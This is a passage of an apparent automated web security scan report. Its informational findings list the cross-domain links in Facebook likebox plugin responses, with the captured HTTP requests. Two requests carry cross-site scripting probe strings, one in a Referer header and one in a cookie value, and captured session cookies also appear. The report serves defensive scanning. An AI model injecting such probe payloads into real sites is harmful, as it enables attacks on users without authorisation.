http://profile.ak.fbcdn.net/hprofile-ak-snc4/161755_1516233108_3624471_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/173714_100002099733844_620947_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/173823_583081899_855451_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202910_30100351_6302006_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203013_1594520820_732429_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203168_583541383_5974255_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41763_100000233118312_2392_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_8062627951_7431_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

16.55. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161182_100000618593365_7043129_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/161755_1516233108_3624471_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/173714_100002099733844_620947_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/173829_1121954486_3643890_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186257_100002085327936_6884987_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203013_1594520820_732429_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203168_583541383_5974255_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27346_218301189_4069_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41763_100000233118312_2392_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_8062627951_7431_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

16.56. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Faol&width=292&colorscheme=light&connections=10&stream=false&header=true&height=300

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/174406_1209024507_6026034_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/174868_107651419258212_7433843_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187114_100001408469053_6849283_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187169_100001480571054_4571090_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187675_100002265200974_930338_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195469_100000732676954_45178_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202900_1000749683_799781_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211227_100001138994662_8069412_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41437_100000492847628_3805_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41724_100001214862014_9793_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Faol&width=292&colorscheme=light&connections=10&stream=false&header=true&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/?ba9f0%22-alert(1)-%22394da22382f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

16.57. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df358c084ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161659_100000284158351_5615996_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186026_100000227723086_3083391_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186306_100001677506211_2725896_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186714_1605429091_6843314_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187521_1003057323_1281803_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195432_1620706090_6822998_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195650_100001563480027_4575550_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195659_1694427025_5881089_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202830_100002180027523_7402851_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202988_736611069_7575841_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203061_100001922588645_5847502_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203247_100000255574831_1503849_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211386_100000863514899_5837555_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211391_713468228_4670594_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211540_1238885907_2541593_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211544_100000505084012_4898663_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211563_100002020447663_1302764_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_100000862415977_9649_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/48975_100000541068085_1143330_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_112585963017_76_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df358c084ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b359449c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

16.58. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=16327590002&width=292&connections=0&stream=false&header=false&height=165

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/aDyW45UzMGZ.css
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27524_16327590002_3202_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?id=16327590002&width=292&connections=0&stream=false&header=false&height=165 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.150.43
Connection: close
Date: Thu, 05 May 2011 11:41:43 GMT
Content-Length: 9755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/aDyW45UzMGZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/gamescom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27524_16327590002_3202_q.jpg" alt="Games.com" /></a>
...[SNIP]...

16.59. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b533dbd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161659_100000284158351_5615996_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/173661_100001927208218_4330449_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186026_100000227723086_3083391_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186091_100002020447663_2480431_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186306_100001677506211_2725896_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186714_1605429091_6843314_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187521_1003057323_1281803_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195432_1620706090_6822998_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195650_100001563480027_4575550_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195659_1694427025_5881089_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195681_768343438_3440506_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202830_100002180027523_7402851_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203061_100001922588645_5847502_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203131_100000691198810_2600500_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203247_100000255574831_1503849_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211386_100000863514899_5837555_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211527_100000122242009_5562262_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211544_100000505084012_4898663_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/23086_100000884642321_127_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/23086_1433334761_8203_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_100000862415977_9649_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/48975_100000541068085_1143330_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_112585963017_76_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

16.60. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2847ddde%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161659_100000284158351_5615996_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/173661_100001927208218_4330449_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186026_100000227723086_3083391_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186306_100001677506211_2725896_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186714_1605429091_6843314_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187521_1003057323_1281803_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195432_1620706090_6822998_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195650_100001563480027_4575550_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195659_1694427025_5881089_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202830_100002180027523_7402851_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202988_736611069_7575841_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203061_100001922588645_5847502_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203247_100000255574831_1503849_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211386_100000863514899_5837555_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211540_1238885907_2541593_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211544_100000505084012_4898663_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211563_100002020447663_1302764_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/23086_1433334761_8203_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_100000862415977_9649_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/48975_100000541068085_1143330_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_112585963017_76_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2847ddde%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

16.61. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Faol&width=292&colorscheme=light&connections=10&stream=false&header=true&height=300

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161348_100000965163441_3475312_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/174406_1209024507_6026034_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/174868_107651419258212_7433843_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186487_100002189919976_7245356_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187114_100001408469053_6849283_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187169_100001480571054_4571090_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187654_520654614_6638206_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203230_1838834503_3180560_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203359_100002205135374_6613443_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41466_100001399603033_9202_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

16.62. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161097_930382_8228585_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/161182_100000618593365_7043129_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/161755_1516233108_3624471_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/173823_583081899_855451_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187666_7306067_1182998_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202910_30100351_6302006_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203013_1594520820_732429_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203301_703272195_7499323_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41763_100000233118312_2392_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_8062627951_7431_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

16.63. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/174310_100002069098597_3968774_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195314_100002337679715_4818693_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203391_613106556_2350049_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211576_100002365579408_3612087_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211839_100000604077298_6444329_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_1807846432_6539_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41378_1052920272_6298_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41711_649575932_6160140_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/49132_533718073_3136_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_8062627951_7431_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/70762_100001693667674_5838163_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

16.64. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161182_100000618593365_7043129_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/173714_100002099733844_620947_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/173829_1121954486_3643890_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187462_1186178049_296688_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202881_100000740764777_2270693_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203168_583541383_5974255_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211402_100002304294370_8323723_q.jpg
